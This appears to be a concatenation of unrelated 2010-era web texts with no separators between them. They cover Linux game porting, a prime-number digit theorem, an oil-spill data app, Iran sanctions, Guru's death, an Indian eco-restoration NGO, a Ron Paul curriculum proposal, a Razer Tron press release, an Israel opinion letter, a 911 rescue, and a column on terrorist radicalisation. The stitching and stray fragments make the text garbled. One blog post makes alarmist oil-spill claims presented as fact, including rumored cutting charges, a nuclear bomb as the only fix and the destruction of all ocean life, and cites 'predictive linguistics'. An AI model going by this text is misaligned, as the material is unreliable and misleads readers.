Regardless , one of those game companies had to resort to bit torrent downloads due to their servers cratering under the assault of downloads from the /. article .
No market for Linux games .... yeah right .
But to quote Yoda , " Short of native game choices we are .
" There 's a reason for that ... I mean aside from the myth that the Linux market is too small to support game development .
We 've spent some time talking with Dave Burke .
Dave is the originating author of Osmos .
As we announced albeit a bit late Osmos is now ported to Linux and it's quite an entertaining game .
Dave speaks with us about some of his history in gaming and why he ported it to Linux .
And possibly why others do or will not .
This is n't news to most people who write game code for a living .
The 2d boy folks lamented the fact that the latency problems in Pulse Audio was a bugger to work around .
Even desktop users who enjoy Linux have had to throw cold water on two audio devices fighting different audio modes .
I do n't have the answers ... I 'm a hack blogger ... Maybe you do .
All - Righty
Then ...
On average , there are as many prime numbers for which the sum of decimal digits is even as prime numbers for which it is odd .
This hypothesis , first made in 1968 , has recently been proven by researchers from the Institut de Mathématiques de Luminy ( CNRS / Université de la Méditerranée ) .
A prime number is an integer greater than or equal to 2 that has exactly two distinct natural number divisors , 1 and itself .
For example , 2 , 3 , 5 , 7 , 11 , ... , 1789 , etc. are prime numbers , whereas 9 , divisible by 3 , is not a prime number .
Numerous arithmetical problems concern prime numbers and most of them still remain unresolved , sometimes even after several centuries .
For example , it has been known since Euclid that the sequence of prime numbers is infinite , but it is still not known if an infinity of prime numbers p exists such that p+2 is also a prime number ( problem of twin prime numbers ) .
In the same way , it is not known if there exists an infinity of prime numbers , the decimal representation of which does not use the digit 7 .
Two researchers from the Institut de Mathématiques de Luminy ( CNRS / Université de la Méditerranée ) have recently made an important breakthrough regarding a conjecture formulated in 1968 by the Russian mathematician Alexandre Gelfond concerning the sum of digits of prime numbers .
In particular , they have demonstrated that , on average , there are as many prime numbers for which the sum of decimal digits is even as prime numbers for which it is odd .
The methods employed to arrive at this result , derived from combinatorial mathematics , the analytical theory of numbers and harmonic analysis , are highly groundbreaking and should pave the way to the resolution of other difficult questions concerning the representation of certain sequences of integers .
Quite apart from their theoretical interest , these questions are directly linked to the construction of sequences of pseudo - random numbers and have important applications in digital simulation and cryptography .
It started off innocently enough ; it was just like any other Tuesday at the office when suddenly I got the call : Secret Agent Chris :
We have a job for you .
We need a combination mobile and web application built in three days time .
Should you or any member of your team fail in your mission , the Agency will disavow any knowledge of your actions .
Me :
You can count on us sir !
And with that we set upon building just what they had asked for : a mobile application that ran on both the iPhone and Android platforms that pushed data collected by clandestine agents to a web service with a nefarious purpose .
Actually , save for the limited time constraint , none of that is true .
The app is in fact for the Gulf of Mexico oil spill and the clandestine agents are volunteers spread around the gulf armed with smartphones .
CrisisCommons , a gathering of “ idealists and innovators ” , had worked with Intridea previously in the aftermath of the Haitian earthquake and with that collaboration came Tradui , a mobile app built for iPhone and Android that could translate English to Creole and back .
Knowing firsthand our adherence to agile development practices , they turned to us for help in fleshing out their ideas for the oil spill .
Principally , what they wanted was a means for anybody to download the app for their smartphone , collect data for their affected area and then upload that data to a single web service which would make that information available to anybody who wanted it .
Having already authored several cross- platform mobile apps , our Director of Mobile Development , Brendan Lim , immediately set to work writing the app in Titanium , an effort I was only too happy to help with .
Having programmed iPhone apps only in Objective -C , I can attest to the fact that it ’s a strange sight to see your rather verbose Cocoa method calls reduced to just a few lines of Javascript .
But the security blanket of verbosity quickly receded in my mind as Brendan and I made enormous progress in just a few hours .
We continued working well into the night and by around one o’clock in the morning we had a working Titanium application that could be compiled for either the iPhone or Android platform .
The next big task on our list was the web service .
Aside from some required fields , we were given lots of leeway as to how it would function .
We went with a Rails instance running on Heroku and began developing a RESTful web service that would be simple to communicate with .
Modifying the mobile app in tandem , we were able to get a working provider / consumer solution working within the evening .
Users could now send data about a location such as the amount of oil , destroyed wildlife , etc as well as any associated photos .
When the next day rolled around , we found ourselves with an additional resource in the form of Jonathan Nelson .
Having a keen eye for UI , he set to work making both our mobile and web apps look fantastic .
Iterating over countless designs , we had within an evening a splash page , theme and all the graphic components necessary to give our apps the professional and uniform look they deserved .
Since then we ’ve gone on to add a Google Maps overlay , an API service for outside developers and a host of other features .
But it ’s worth noting that within three days time a usable application was up and running .
It speaks volumes not only about a small company spread over a dozen timezones but also about agile practices and the plethora of great services out there like Heroku and GitHub that make this quick development path possible .
Checkout the website and download the apps !
Image caption Iran says its nuclear programme is aimed solely at peaceful energy use
Iran faces its toughest sanctions for failing to comply with UN demands over its nuclear enrichment , the US says .
The Security Council is set to vote on a fourth round of sanctions to tighten financial curbs on Iran , while expanding a limited arms embargo .
US Secretary of State Hillary Clinton said they were " the most significant sanctions that Iran has ever faced " .
But Iran 's president warned his country would not agree to nuclear talks if the sanctions were imposed .
The amount of unity that has been engendered by the international community is very significant Hillary Clinton , US Secretary of State Last resort or lost opportunity ?
New Iran sanctions " not the last "
Mahmoud Ahmadinejad also said that a nuclear fuel - swap deal brokered by Turkey and Brazil was an offer that would not be repeated .
Iran agreed in May to deposit 1,200kg of low - enriched uranium with Turkey , in return for reactor fuel , but the US and its Western allies said the agreement was too little too late .
They fear Tehran is secretly trying to build a nuclear bomb .
Iran says its programme is aimed solely at peaceful energy use .
Kill negotiations ?
There have been three rounds of UN sanctions against Iran , blocking trade of " sensitive nuclear material " , freezing the financial assets of those involved in Iran 's nuclear activities , banning all of Iran 's arms exports and encouraging scrutiny of the dealings of Iranian banks .
The new set of proposed sanctions is aimed at putting pressure on Tehran to stop enriching uranium .
Although it was watered down during negotiations with Russia and China on Tuesday , it does tighten existing restrictions on areas like shipping and finance .
Its proposals include :
Prohibiting Iran from buying several categories of heavy weapons including attack helicopters and missiles
Urging all states to inspect cargo suspected of containing banned items to and from Iran in their territory , including seaports and airports
Calling on countries to block financial transactions and ban the licensing of Iranian banks if they suspect a link to nuclear activities
Increasing the number of individuals - reportedly including senior nuclear officials - and companies targeted with asset freezes and travel bans
Mrs Clinton was upbeat about the prospect of the new resolution , which has the support of all five of the UN 's veto - holding members .
DRAFT UN RESOLUTION [ 114KB ]
Most computers will open PDF documents automatically , but you may need Adobe Reader Download the reader here
" The amount of unity that has been engendered by the international community is very significant , " she said during a press conference with Ecuadorian President Rafael Correa in Quito .
Brazil and Turkey - also security council members - say the sanctions will kill attempts to revive negotiations with Iran , and put that case forward in a last - minute special session at the UN on Tuesday .
Despite their reservations , though , the BBC's Barbara Plett at the UN headquarters in New York said there was little doubt the resolution would be adopted .
While Turkey , Brazil and Lebanon are not expected to back the resolution , none of them has a veto .
Western diplomats expect 12 countries on the 15 - member council to vote for the measure .
On Wednesday , the US , Russia and France outlined their concerns about the Iran - Turkey - Brazil deal in letters to the International Atomic Energy Agency ( IAEA ) .
The letters were not made public , but US envoy to the IAEA Glyn Davies said the deal " would still leave Iran with substantial stocks [ of low - enriched uranium ] , decreasing the confidence - building value of the original proposal " .
Iranian nuclear chief Ali Akbar Salehi said the UN vote showed that " from the beginning , [ the US and its allies ] were not interested to do the deal " .
Backing Iran 's enemies ?
Mr Ahmadinejad , speaking on Tuesday in Istanbul where he is attending a regional summit , said that if the US did not change its position " the first ones to lose would be President Obama and the people of the United States " .
Image caption The US has denied abducting Iranian scientist Shahram Amiri
He also urged Russia to be " careful not to be beside the enemies of the Iranian people " .
His comments came ahead of talks with Russian Prime Minister Vladimir Putin , who is also attending the summit in Turkey , and has in the past cautioned against tough action on Iran .
Amid heightened tensions over the new resolution , Iran said on Tuesday it had evidence one of its nuclear scientists was abducted and was being held in the US against his will .
Shahram Amiri disappeared a year ago while on a pilgrimage to Saudi Arabia .
A video broadcast by Iranian TV on Tuesday purported to show Mr Amiri saying he had been kidnapped and was living in Arizona .
Hours later , another video posted on YouTube appeared to show the scientist saying he was happy in America .
The US has denied abducting him .
In the statement announcing the death of Gang Starr 's Guru on Monday , a letter was included that found the MC directing some harsh words at his longtime partner in the group , DJ Premier .
Some have questioned the validity of the letter — claims that Guru 's recent partner , Solar , has refuted .
" I do not wish my ex-DJ to have anything to do with my name , likeness , events , tributes etc. connected in anyway to my situation including any use of my name or circumstance for any reason and I have instructed my lawyers to enforce this , " the letter reads .
" I had nothing to do with him in life for over 7 years and want nothing to do with him in death .
Solar has my life story and is well informed on my family situation , as well as the real reason for separating from my ex-DJ . "
In a statement issued Wednesday ( April 21 ) on a DJ Premier fan blog that his manager had earlier told MTV News is legitimate , the Gang Starr DJ chose not to address the comments in the letter and instead remember his longtime collaborator .
" It was a sad day for me to get confirmation on the death of a man who I will continue to call my brother , Keith Elam , better known as Guru of the legendary Gang Starr , " the statement reads .
" From 1988 - 2004 , we experienced so much success together that we were able to expand our businesses independently and give each other what Guru called ' creative space , ' before planning to reunite for our seventh LP when the time was right .
Tragically , we will never reach that day .
" I 've been asked to comment on a letter speaking ill of me which was supposedly written by Guru in his dying days .
All I will say about it is that our time together was beautiful , we built a hip - hop legacy together , and no one can re-write history or take away my love for him .
One thing I would never do is play around with the truth about his life .
" I will celebrate Guru 's life ... I will honor his memory ...
I will grieve with the Elam family over his untimely death ...
I will remember the Gang Starr foundation and all of the original members of Gang Starr who came before me — we all know each other ... mostly , I will cherish everything we created together as Gang Starr , forever .
I 'm gonna miss hearing his signature monotone voice when he walks in the room , but the songs will always bring it back to me ...
His rhyme flows were insane , and I will never remove him from my heart and soul .
Rest in peace to the man who felt ' satisfaction from the street crowd reaction . '
I love you Goo ... DJ Premier . "
Share your memories of Guru and Gang Starr in the comments below .
Promotion
This is the story of a land that was at one time lying ravaged , drought stricken and forsaken .
It was a committed revolution led by a couple , Bablu Ganguly and Mary Vattamattam , which has now transformed this land into an agro forest habitat .
The unproductive soil was rejuvenated , rain water was harvested , trees were planted , crops were cultivated and the entire land blossomed .
Twenty years ago , Bablu and Mary set their foot on this barren land in the district of Anantapur in Andhra Pradesh .
People had given up on this land , of which Bablu and Mary decided to buy 32 acres ; probably the last thing one would expect from a young couple .
The spark that triggered this initiative was a book – ‘ The One - Straw Revolution ’ , by a Japanese author Masanobu Fukuoka .
The book carried a very special message on how humanity can live an enriching life hand in hand with the nature .
Bablu and Mary carried this spirit and conceived their vision for this land that they called ‘ Timbaktu ’ , meaning ‘ Where the earth meets the sky ’ .
Their aspiration was humble and they wanted to keep everything simple – get closer to the land and help it regenerate itself .
They knew there was potential in the land of Timbaktu which was once part of the rich and powerful Vijayanagara Kingdom .
Its forests were considered to be the finest , its fruits were savored across the country and various armies fought to keep control of this once fertile land .
But everything was destroyed by ruthless deforestation and use of environmentally damaging pesticides and fertilizers .
Over the years , villages in this region have been tormented by chronic drought , unproductive land , unemployment and poor infrastructural facilities .
Bablu and Mary decided to build the Timbaktu land by engaging with the villages around and formed an NGO called The Timbaktu Collective .
“ Our vision is to stop the degradation of the land in Anantapur district and to find ways to reverse it .
We want to green the hills and the land .
We want to develop alternative lifestyles .
Lifestyles that are sustainable and provide more liberty and happiness , than those based on exploitation .
The farmers see their land degrade and the wells drying up , but they do n’t know what to do , so they just continue their patterns of self - destruction .
We want to find a path that leads out of this vicious circle , not without but together with them ” – they say .
Promotion
In 1991 , the couple decided to put their first crop in the land of Timbaktu and as everyone around them said , the crop failed .
That became even more instigating – Bablu went ahead and bought 7000 saplings .
He and Mary brought farmers from the villages to build creative water harvesting structures ensuring that every drop of water was judiciously used .
Seed dibbling and such traditional farming methods were practiced – and the colour of the land started changing .
Timbaktu was transformed from a barren earth to a lush green forest .
It ’s heartening to see that birds , snakes and butterflies have come back to Timbaktu and a lost glory is reinstated .
This is a true success story of eco-restoration and the experiment is being replicated with community support in a 10,000 acre waste land named as Kalpavalli .
The Timbaktu Collective grew to become a 105 member strong team who serve over 140 villages in Chennekothapalli , Roddam and Ramagiri mandals of Anantapur district .
The organization runs two schools , one of which is a residential school for children from disadvantaged families .
There is also a thrift credit system for the women which has now grown into a well established alternative banking system .
Farmers in the villages are given training in organic farming methods and the Collective supports a Cooperative Society that assists the farmers in marketing their organic produce .
With youth development , child rights activities , helping the disabled , cultural activities and many such programmes , the Timbaktu Collective has changed the face of humanity here .
Bablu and Mary stay in Timbaktu , in a house that is built with mud , built by them and built using things available in the land of Timbaktu .
Their children studied in the school run by the NGO for the villagers .
Their organization has made a difference to the lives of over 12,500 marginalized families .
How much more purposeful can their lives get ?
How much bigger role models do we need to start doing our bit for the world around us ?
Visit Timbaktu to know the true spirit of this land .
Find information about them on their website www.timbaktu.org.
Also , watch this video where Bablu and Mary take you through the 20 years of Timbaktu .
You can also write to them at timbaktu.info@gmail.com .
Ron Paul's Home School High School Curriculum -- By Far The Best Curriculum , at the Right Price : Free !
May 5 , 2010
Ron Paul 's home school curriculum is going to be popular .
His ideas appeal to home school parents .
This curriculum reinforces their outlook .
GOVERNMENT
Most states require a course in civics .
There is nothing to match this .
It begins in the junior year .
There is an elective senior course .
The Law .
This is a first - semester course on the law .
Textbook : Bastiat 's The Law .
This is a series of readings on the theory of limited civil government .
It includes primary source documents and articles from The Freeman and Mises.org .
U.S. Constitution .
This is a second - semester course .
It is taken simultaneously with the American history course .
It shows what the Framers ' goals were for the Constitution : limited government .
It covers the anti-Federalists , who warned of political centralization and loss of liberty .
It shows how the Supreme Court hijacked the Constitution in 1803 with Marbury vs. Madison : the doctrine of judicial review , which the Framers had not foreseen .
It also shows how Presidents centralized power , how Congress centralized power , and why voters promoted both .
Textbook : The Revolution : A Manifesto .
Local Politics .
This is a senior - year course .
It is not mandatory .
The student is taught the basics of local government .
Students are provided with a free template to set up their own WordPress websites .
They can monitor local city councils , county commissioners , and local school boards , and report on them .
Newspapers do not offer this in depth .
This teaches them how to get involved in precint politics .
It teaches them about using a website to develop a mailing list for a campaign for local office five years down the road .
It teaches them the dogcatcher strategy .
AMERICAN HISTORY
This is a one - year course taken in the junior year .
This course begins with Jamestown .
It shows how economic and political freedom led to the establishment of the largest free trade zone in the world : the United States .
It emphasizes the war between business enterprise and state regulation , and how big business got into control after the Civil War by using the government .
It also covers the religious history of the United States , based on the pro-liberty book by Stark and Finke , The Churching of America .
It covers the three attempts to saddle the nation with a central bank , and how the big banks got the Federal Reserve Act passed late in 1913 .
Textbook : End the Fed .
It covers all of the major wars , from King Philip 's War ( 1675 - 76 ) to the Iraq War , and why we got into them , case by case .
The course is based on careful readings of primary source documents , with commentaries .
AMERICAN LITERATURE AND RHETORIC
This is a junior - year course .
It parallels the American history course .
It assigns classic political speeches to show how the speakers used rhetoric to persuade their listeners .
It assigns literature that describes the transformation of the continent .
It also exposes socialist literature as propaganda , and traces the background of these authors .
Students are required to write two major term papers and post them on their oiwn individual websites .
The student is given a free template for his home school papers .
RHETORIC
This is a senior - year course in English .
It teaches students how to write persuasively : classified ads , eBay ads , Craigslist ads , letters to the editor , and speeches .
Instead of writing poetry that will not sell , they write advertising jingles that might sell .
This is action - oriented rhetoric , as all rhetoric should be .
PUBLIC SPEAKING
Each student takes a year of public speaking : senior year .
Students are required to give one speech per month and post each one on their own YouTube channels , which are free to set up .
WESTERN CIVILIZATION
This is two - year course : sophomore and junior years .
First semester : From The Hebrews through Greece and Rome , into the medieval world .
Second semester : Renaissance and Reformation , the Enlightenment , and the rise of the nation - state and modern warfare .
Third semester :
The rise of mercantilism , the free market , economic growth , science and technology , and the banking system .
Fourth semester : From World War I to the present .
This covers the rise of total war and the parallel developments : socialism , communism , and the welfare - warfare state .
WESTERN LITERATURE
Sophomore and junior years : parallels the Western civilization course chronologically .
The readings reveal the culture of the West .
Included are plays , poetry , hymns , legends , short stories , and novels .
ECONOMICS
A one - year introduction to Austrian School economic theory .
It is taken either in the sophomore or junior year .
Topics : property rights , price theory , profir and loss , monetary theory , capital theory , and taxation .
BUSINESS
A junior - year course in the spirit of enterprise and starting a home business .
Entrepreneurship and the rise of American business .
Textbook : John Chamberlain's The Enterprising Americans .
Also : Ludwig von Mises 's Bureaucracy and Profit and Loss .
First semester :
The course directs students to the Junior Achievement program .
Second semester :
How to start a Web - based home business from scratch .
PRACTICAL MATHEMATICS
Senior - year course .
First semester : budgeting ( time and money ) , the time value of money ( interest ) , credit cards , debit cards , renting vs. buying , insurance , college costs .
Second semester : investing -- stocks , bonds , foreign currencies , mutual funds , ETFs , precious metals , real estate .
Key skill : how to create and use a spreadsheet ( OpenOffice ) .
MATH AND SCIENCE
No need to reinvent the wheel .
Salman Khan has done the work : www.KhanAcademy.org.
HOW TO DOWNLOAD IT
That 's the main problem .
This curriculum does not exist yet .
But it could .
Two years from now , it could be on - line .
One year from now , the sophomore year could be on - line .
Could it be offered for free ?
Of course .
Websites are free .
YouTube and Blip.tv are free .
Blip.tv offers unlimited time , but 25 minutes per lesson are enough .
It also offers free MP3 files , which can be linked to iTunes .
There could be workbooks and on - line exams with instant feedback .
Can you imagine what kind of response he could get from voters in the 2012 election campaign ?
What a campaign slogan : Free Education -- No Taxation -- Now !
Every time some Establishment pundit attacked the curriculum , a hundred parents would go to the site and register their teenagers : www.RonPaulCurriculum.com.
What a mailing list this would be !
A long - term revolution ?
This is the foundation .
He does not have to win the election to launch it .
He only has to run . . . if he has this curriculum ready to go .
Does his campaign fund have enough money to create this course ?
Of course .
What would it cost to create it ?
I figure half a dozen grad students could do it for $ 30,000 each for two years .
Grad students are hungry .
They can't get decent - paying jobs .
This assumes that he would have to pay .
I imagine that there are graduate students out these who would work for free over a summer as interns to have their names on these courses .
Would high school teachers pitch in for free , sharing their ideas ?
I think so .
All we have to do is convince him to hire a coordinator to get the project rolling .
I suggest Dr. Robert Murphy .
He is the master of the student workbook .
If Dr. Paul does n't do this , I plan to .
But I can not get it on - line in two years in time for 2012 .
He can .
I have reserved this web domain : www.RonPaulCurriculum.com.
I 'll give it to him when the first year of the curriculum is ready for posting .
If you think it 's a good idea , let him know .
Subject : Education .
To celebrate the launch of the new Tron Legacy movie , Razer has launched a new Tron gaming mouse and keyboard , and the mouse features a 5600 dpi 3.5g sensor , and the gaming keyboard features a range of programmable keys and macros , as well as a detachable keyboard .
TRON PC Peripherals from Razer : Razer is a leader in high - end PC gaming and lifestyle peripherals and has an established reputation for creating the world ’s most precise and advanced tools for gaming .
The new TRON : Legacy gaming peripherals from Razer include : an ergonomic gaming mouse incorporating Razer ’s 5600 dpi 3.5g gaming grade sensor , a gaming keyboard with programmable keys and macro capabilities as well as a detachable keypad , and a high precision mouse mat – all designed to create the ultimate gaming experience featuring highly detailed finishes and lighting effects ..
The Tron Legacy Mouse will be available for $ 79 whilst the Tron Legacy keyboard will be available for $ 139 from Razer .
via Slash Gear
Press Release
TRON PC Peripherals from Razer : Razer is a leader in high - end PC gaming and lifestyle peripherals and has an established reputation for creating the world ’s most precise and advanced tools for gaming .
The new TRON : Legacy gaming peripherals from Razer include : an ergonomic gaming mouse incorporating Razer ’s 5600 dpi 3.5g gaming grade sensor , a gaming keyboard with programmable keys and macro capabilities as well as a detachable keypad , and a high precision mouse mat – all designed to create the ultimate gaming experience featuring highly detailed finishes and lighting effects .
The product line will range in price from SRP $ 79-139 .
TRON Game Controllers and Apple Accessories from PDP : Unique multiplatform TRON game controllers from PDP bring the look and feel of TRON : Legacy directly into the hands of gamers with light - up accents , perforated details and performance - enhancing contours and design .
Playstation 3 ® and Xbox 360® controllers are corded with precision parts and vibration support ; the Wii™ controller is wireless .
Available in tandem with the TRON : Evolution video game release , the SRP for each is $ 49.99 .
PDP will also offer a line of iPod® , iPhone® and iPad® cases inspired by the world of TRON .
TRON : Legacy Products at Comic Con
Fans will get a first look at the all new TRON : Legacy - inspired toys and electronics at San Diego Comic Con next month .
Disney will showcase an interactive TRON booth that will engage fans with an array of new TRON - inspired merchandise launching this fall .
Capturing the action , light , and cool aesthetic style of the film , the line on display will also include collectibles , apparel and accessories for men and women , publishing and the new TRON : Evolution video game from Disney Interactive Studios .
Comic
Con exclusive TRON product will also be on sale .
Disney will also reveal exciting new mobile content at the event .
San Diego Comic
Con will be held at the San Diego Convention Center July 22 - 25 , 2010 .
Visit booth # 3712 to see the TRON showcase .
About TRON : Legacy
TRON : Legacy is a 3D high - tech adventure set in a digital world that ’s unlike anything ever captured on the big screen .
Sam Flynn ( Garrett Hedlund ) , a rebellious 27 - year - old , is haunted by the mysterious disappearance of his father Kevin Flynn ( Oscar® - and Golden Globe® - winner Jeff Bridges ) , a man once known as the world ’s leading video - game developer .
When Sam investigates a strange signal sent from the old Flynn ’s Arcade — a signal that could only come from his father — he finds himself pulled into a digital world where Kevin has been trapped for 20 years .
With the help of the fearless warrior Quorra ( Olivia Wilde ) , father and son embark on a life - or - death journey across a visually - stunning cyber universe — a universe created by Kevin himself that has become far more advanced with never - before - imagined vehicles , weapons , landscapes and a ruthless villain who will stop at nothing to prevent their escape .
Presented in Disney Digital 3D ™ and scored by Grammy Award® - winning electronic music duo Daft Punk , TRON : Legacy hits U.S. theaters on Dec. 17 , 2010 in Disney Digital 3D ™ and IMAX ® 3D. nology .
Latest Geeky Gadgets Deals
12 days into the oil rig ' accident ' events continue to evolve and weather is slowing down efforts to contain things , we have two interesting items to report that are not in the MSM yet ... OK , three then .
1 . We have heard that a supply ship arrived just before the explosions and it was reported to be ' manned by all new people , nobody aboard was from the ' usual supply crew ' .
This purported industry source continues : there were a total of 14 explosions and these could have been cutting charges .
Moreover , the shut off valve below the surface ( 5000 feet down ) on the seabed is not longer controllable .
Still , lots of disinfo and speculation scampering around the netosphere .
While this is bad , it gets worse .
2 . A reader who is an engineer of considerable experience says watch this one evolve carefully because it is destined to continue to grow and he shares this long ( but worthy explanation why : " Heard your mention of the oil disaster in the Gulf of Mexico this morning , and you ( and most everyone else except maybe George Noory ) are totally missing the boat on how big and bad of a disaster this is .
First fact , the original estimate was about 5,000 gallons of oil a day spilling into the ocean .
Now they 're saying 200,000 gallons a day .
That 's over a million gallons of crude oil a week !
I 'm engineer with 25 years of experience .
I 've worked on some big projects with big machines .
Maybe that 's why this mess is so clear to me .
[ and is so unclear to the millions without such knowledge ]
First , the BP platform was drilling for what they call deep oil .
They go out where the ocean is about 5,000 feet deep and drill another 30,000 feet into the crust of the earth .
This it right on the edge of what human technology can do .
Well , this time they hit a pocket of oil at such high pressure that it burst all of their safety valves all the way up to the drilling rig and then caused the rig to explode and sink .
Take a moment to grasp the import of that .
The pressure behind this oil is so high that it destroyed the maximum effort of human science to contain it .
When the rig sank it flipped over and landed on top of the drill hole some 5,000 feet under the ocean .
Now they 've got a hole in the ocean floor , 5,000 feet down with a wrecked oil drilling rig sitting on top of is spewing 200,000 barrels of oil a day into the ocean .
Take a moment and consider that , will you !
First they have to get the oil rig off the hole to get at it in order to try to cap it .
Do you know the level of effort it will take to move that wrecked oil rig , sitting under 5,000 feet of water ?
That operation alone would take years and hundreds of millions to accomplish .
Then , how do you cap that hole in the muddy ocean floor ?
There just is no way .
No way .
The only piece of human technology that might address this is a nuclear bomb .
I 'm not kidding .
If they put a nuke down there in the right spot it might seal up the hole .
Nothing short of that will work .
If we can't cap that hole that oil is going to destroy the oceans of the world .
It only takes one quart of motor oil to make 250,000 gallons of ocean water toxic to wildlife .
Are you starting to get the magnitude of this ?
We 're so used to our politicians creating false crises to forward their criminal agendas that we are n't recognizing that we 're staring straight into possibly the greatest disaster mankind will ever see .
Imagine what happens if that oil keeps flowing until it destroys all life in the oceans of this planet .
Who knows how big of a reservoir of oil is down there .
Not to mention that the oceans are critical to maintaining the proper oxygen level in the atmosphere for human life .
We 're humped .
Unless
God steps in and fixes this .
No human can .
You can be sure of that .
3 . The third thing to bring attention to is the predictive linguistics discussion of the ' blue flue " in the latest Shape of Things to Come report of what 's ahead for the world 's oceans .
In particular , what strikes me is that while some of the focus is on the possibility of methane hydrate releases later in the year , the spelling in the report is ' flue ' ( and in upward conveyance , not ' flu ' and is sickness per se ) .
" This [ big clue methane related ] incident then goes onto cause a [ big stink ] within TPTB [ minion class ] {ed note : most notably the CFR - Council on Foreign Relations} .
Not only are humans and other life directly impacted by the large [ clouds of drifting complex methane housing gas ] but the mere [ release ] of the quantity to be seen causes the TPTB and their [ minion class ] to go [ apeshit ] trying to [ locate ( a believable ) scenario ] to explain the [ blue flue events ( s ) ] .
I 'll grant you that the methane and oil gurgling out of the Gulf of Mexico ( GOM ) right now is not methane hydrate but rather compressed methane , but around here , that 's close enough especially when the ' blue flue ' to the surface has been destroyed . , Curious how just a little spelling like this can tip us off that we 've got something of a serious hit developing .
The latest trajectory map out of NOAA which should be updated over the weekend looks like this .... in a word : Grim ...
We hear - again from people who are reliable sources , but who we wo n't name in order to keep them from getting fired , is that there are a couple of parishes ( county equivalents ) in Louisiana which are preparing evacuation plans because people are being made sick by the smell of the oil and gas being blown onshore .
Looking ahead to Sunday through Tuesday , we 'd expect as this grows that there will be emergency operation centers set up and some moving of people to begin , which would then feed in to the Diaspora meta data layer of Cliff 's work .
Not to be glum , but you can see most likely how this all starts to tie together ?
We will be topping off our ' investment grade diesel reserves and getting our additional solar panels ordered this week , so as to hit the next level of energy independence before the global impacts come into focus over the next month or two .
You may wish to do so , as well ...
Terrible way to score a bot hit , but that 's how this stuff works , so now we need to deal with it .
Impacts at the Pump
If you look at a chart of oil prices , you 'll see that although oil was down around $ 81.30 on Wednesday early in the session , it was up to $ 86 and change on Friday .
This is a pretty heft move :
On the order of 5.7 % and if it continues , you can bet there will be follow - up at the gas pump .
If you click over to the Triple A fuel gauge report ( a site you may wish to bookmark for future reference ) you 'll see that the price of fuel at the wholesale and crude levels have increased faster than retail so it may not be unreasonable to crank an addition several percent into the family budget for auto expenses over summer .
In accordance with Title 17 U.S.C.
Section 107 , this material is distributed without profit to those who have expressed a prior interest in receiving the included information for research and educational purposes .
There is no affiliation whatsoever with the originator of this article and is not endorsed or sponsored by the originator . )
From TPM Reader SG …
I am all for a Palestinian state and I have little regard for the Netanyahu government , but I am really tired of seeing folks on the left , people whom I agree with on most other political issues , take seriously the idea of unwinding the whole Zionist enterprise .
Let ’s assume for the purpose of argument that Zionism was an immoral movement .
Fine , so the State of Israel was born in sin .
But birth in sin is not a problem peculiar to Israel .
Scratch any modern nation - state ’s origin story and you ’ll find resettlement , exile , expropriation , genocide , and all the other evils that accompany inter-ethnic warfare .
For most countries , these skeletons have been so deeply buried that the descendants of former enemies can pretend not to care , but for some , like Serbia , the bodies are still pretty fresh .
The First Aliyah was over a hundred years ago ; the State of Israel was admitted to the United Nations over sixty years ago .
All of Israel ’s immediate neighbors accept its * existence * , even if they disagree with Netanyahu on where its borders should run .
The wisdom and morality of Israel ’s policies should be vigorously and freely debated , but the mere question of “ should there be a State of Israel at all ? ” should be closed , at least until the Israelis themselves show an interest in reopening it .
( Among the privileges of independent statehood is the privilege of merging with other independent states .
But when outsiders * tell * a state to merge with another state , or tell it to dissolve itself by exiling its own citizens , we call that something else . )
When apartheid was a live issue , I do n’t remember anyone on the left suggesting that the Afrikaners should move back to the Netherlands .
When the Troubles were more troublesome , I do n’t remember IRA sympathizers proposing that Irish Protestants go back to Scotland .
Why , when it comes to Israel , does the comparable idea keep getting bruited about ?
One of the characteristics of privilege is that people without privilege are expected to constantly account for themselves .
An African - American in a prestigious job faces accusations of “ you ’re not really qualified ; you were just hired to make a quota ” .
A woman who is a victim of sexual assault has to convince others–sometimes , even the police –that she did n’t “ deserve ” what she got .
Gay men and lesbians advocating marriage equality have to present an image of perfect loving eternally pair - bonded couples .
The barrage of demands for Israel to apologize for its own existence is the same kind of bigotry , and people who call themselves “ progressive ” should be ashamed to tolerate it .
Authorities were hailing a 7 - year - old Norwalk boy as a hero Tuesday after he hid in a bathroom and called 911 as three armed attackers burst into his home and threatened his parents .
During the harrowing emergency call , the child pleaded with Los Angeles County sheriff ’s dispatchers to send help .
“ Can you come really fast ?
Please !
Please ! . . .
They have guns .
They shoot my mom and dad , ” the boy said , according to a copy of the 911 tape released by authorities .
The incident began about 8:30 a.m. when the three suspects , armed with handguns , stormed through an unlocked door and said they were going to take what they wanted , the Sheriff ’s Department said .
The boy hid in the bathroom with his 6 - year - old sister and locked the door .
“ There ’s some guy who ’s going to kill my mom and dad , ” he told the emergency dispatcher .
“ Can you come , please ?
“ Bring cops . . . a lot of them ! . . .
And soldiers too , ” the boy said .
He told the dispatcher that he thought his parents had been shot .
The attackers broke into the bathroom and found the boy .
At that point , screaming is heard on the 911 tape .
Authorities said one of the suspects grabbed the boy and asked who he called .
“ 911 , ” the boy responded , according to the department .
The suspects fled without injuring anyone or taking any property , authorities said .
“ If not for the brave and educated actions of the 7 - year - old boy , this might have ended tragically , ” said Capt .
Pat Maxwell .
Authorities declined to identify the family .
Anyone with information is asked to call detectives at ( 562 ) 863-8711 .
andrew.blankstein@latimes.com
robert.lopez@latimes.com
Faisal Shahzad sought to massacre scores of fellow Americans in Times Square with a bomb made of M - 88 firecrackers , non-explosive fertilizer , gasoline , and alarm clocks .
Umar Farouk Abdulmutallab tried to blow up a U.S. airliner over Detroit with a firebomb concealed in his underpants .
Maj. Nidal Malik Hasan shot dead 13 fellow soldiers at Fort Hood and wounded 29 .
Why did these men attempt the mass murder of Americans who did no harm to them ?
What impelled them to seek martyrdom amid a pile of American corpses ?
Though all were Muslims , none seems to have been a longtime America - hater or natural - born killer .
Hasan was proud to wear Army fatigues to mosque .
Shahzad had become a U.S. citizen .
Abdulmutallab was the privileged son of a prominent Nigerian banker .
The New York Times ties all three to the Internet sermons of Anwar al - Awlaki , a Yemen - based imam born and educated in the United States who inspires Muslims worldwide to jihad against America .
But , following Sept. 11 , al - Awlaki had been seen as a bridge between Islam and the West .
Now President Obama has authorized his assassination .
What do the four have in common ?
All were converted in manhood into haters of America willing to kill and die in a jihad against America .
And the probability is high that there are many more like them living amongst us who wish to bring the war in the Af - Pak here to America .
But what radicalized them ?
And why do they hate us ?
Taking a cue from George W. Bush , Mayor Michael Bloomberg said of the Times Square bomber , “ We will not be intimidated by those who hate the freedoms that make … this country so great . ”
This was the mantra after Sept. 11 .
We are hated not because of what we do in the Middle East , but because of who we are : people who love freedom and stand for women ’s rights .
